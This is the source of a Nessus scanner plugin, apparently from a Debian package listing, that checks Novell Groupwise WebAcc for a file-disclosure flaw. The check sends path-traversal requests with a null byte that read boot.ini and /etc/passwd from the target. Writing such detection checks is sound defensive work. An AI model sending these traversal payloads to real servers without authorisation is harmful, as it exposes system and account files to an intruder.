File: novell_groupwise_webacc_information_disclosure.nasl

package info (click to toggle)
nessus-plugins 1.0.10-2
  • links: PTS
  • area: main
  • in suites: woody
  • size: 4,924 kB
  • ctags: 408
  • sloc: sh: 7,838; ansic: 3,415; makefile: 233
file content (88 lines) | stat: -rw-r--r-- 2,208 bytes parent folder | download 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
 
#
# Copyright 2001 by Noam Rathaus <noamr@securiteam.com>
#
# See the Nessus Scripts License for details
#
#

if(description)
{
 script_id(10789); 

 name["english"] = "Novell Groupwise WebAcc Information Disclosure";
 script_name(english:name["english"]);

 desc["english"] = "
Novell Groupwise WebAcc Servlet is installed. This servlet exposes 
critical system information, and allows remote attackers to read any file.

Solution: Disable access to the servlet until the author releases a patch.
Risk factor : High

Additional information:
http://www.securiteam.com/securitynews/6S00N0K2UM.html";

 script_description(english:desc["english"]);

 summary["english"] = "Novell Groupwise WebAcc Information Disclosure";
 script_summary(english:summary["english"]);

 script_category(ACT_GATHER_INFO);

 script_copyright(english:"This script is Copyright (C) 2001 SecuriTeam");
 family["english"] = "CGI abuses";
 script_family(english:family["english"]);

 script_dependencie("find_service.nes", "no404.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

url = string("/servlet/webacc");
port = is_cgi_installed(url);
if (port)
{
# test NT systems
req = string("GET /servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00 HTTP/1.0\r\n");
req = string(req, "User-Agent: Mozilla/7 [en] (X11; U; Linux 2.6.1 ia64)\r\n");
req = string(req, "Host: ", get_host_name(), "\r\n\r\n");

soc = open_sock_tcp(port);
if (soc)
{
 send(socket:soc, data:req);
 buf = recv(socket:soc, length:1000);   
 if ("[boot loader]" >< buf)
 {
  security_hole(port:port);
  exit(0);
 }
}
close(soc);

# test unix systems
req = string("GET /servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0\r\n");
req = string(req, "User-Agent: Mozilla/7 [en] (X11; U; Linux 2.6.1 ia64)\r\n");
req = string(req, "Host: ", get_host_name(), "\r\n\r\n");
soc = open_sock_tcp(port);
if (soc)
 {
 send(socket:soc, data:req);
 buf = recv(socket:soc, length:1000);
 if ("root:" >< buf)
  {
   security_hole(port:port);
   exit(0);
  }
  if("File does not exist" >< buf)
  {
   security_note(port:port);
  }
 }
close(soc);
}